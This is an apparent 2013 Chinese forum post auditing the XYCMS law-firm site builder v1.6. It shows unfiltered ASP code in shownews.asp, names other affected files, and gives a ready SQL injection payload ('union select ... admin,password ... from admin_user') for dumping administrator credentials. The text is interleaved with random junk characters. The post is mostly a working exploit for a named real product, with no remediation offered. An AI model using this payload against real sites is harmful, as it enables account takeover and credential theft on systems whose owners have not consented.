前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
# y- h' j$ D# e; T7 w0 F: L7 E
: L) b& b1 Q6 V4 Y淫荡分割线6 {# ]8 L# u! Y0 p" t. }1 O
--------------------------------------------------------. y2 I9 T+ E; p8 v; q4 r
; b5 A# b# `. ?( P0 j审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)" J0 h2 g' u! \8 I; j
源码地址:http://down.chinaz.com/soft/29233.htm
( Y( l- ? g8 Q5 F/ m. U0 f ' ]# P N" o0 `! B1 t6 o
漏洞文件:shownews.asp
. I6 I) b6 y# N/ R2 H6 S3 {0 b- [漏洞代码:7-13行( ]3 |+ l9 L5 y$ l0 e9 n9 A* F
T' B/ \, @; r( n/ n% a
% r; @6 |/ x) v. ]/ z8 t8 k1 M d7 |<% ; Y/ E# d' P5 V5 _0 {2 h
id=request.QueryString("id")! v( x$ g! u# a6 i4 c: W8 K
' \4 x4 ?4 V" M V% N% Z
set snews=server.createobject("adodb.recordset") 9 n' T6 e% a, @5 Z: {+ o
exec="select * from [news] where id="&id% k8 ^ n3 F# w& m& K. I
snews.open exec,conn,1,1
( a& r4 w" V, o' V/ [%>3 r$ O3 i/ W/ J% k$ x; ~
- L+ q2 r/ S/ d1 o! K, Q6 ?4 M Z* f" O. h: l; M$ H
什么过滤都没有 直造成注入( M: N. B! l6 U9 a* Z- }( p, z
- K; U" b+ A3 }+ H/ h; ?3 e) q
注入点:http://127.0.0.1:99/shownews.asp?id=xx
4 d3 @) {( P3 S. x% b9 Z% `# I 3 @. J7 H. E! B7 ~
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
+ u3 S- T$ z/ E. g3 J( q 8 u: \% B6 n. B9 t3 X$ s) K4 @
+ {4 y9 M7 l6 _, b* }/ yexp: union select 1,admin,password,4,5,7 from admin_user) x+ n( _0 p U5 R, k9 o
( M/ O$ D% w- `2 j$ ]- \
|
发表于 2013-4-4 17:28:12
收藏
支持
反对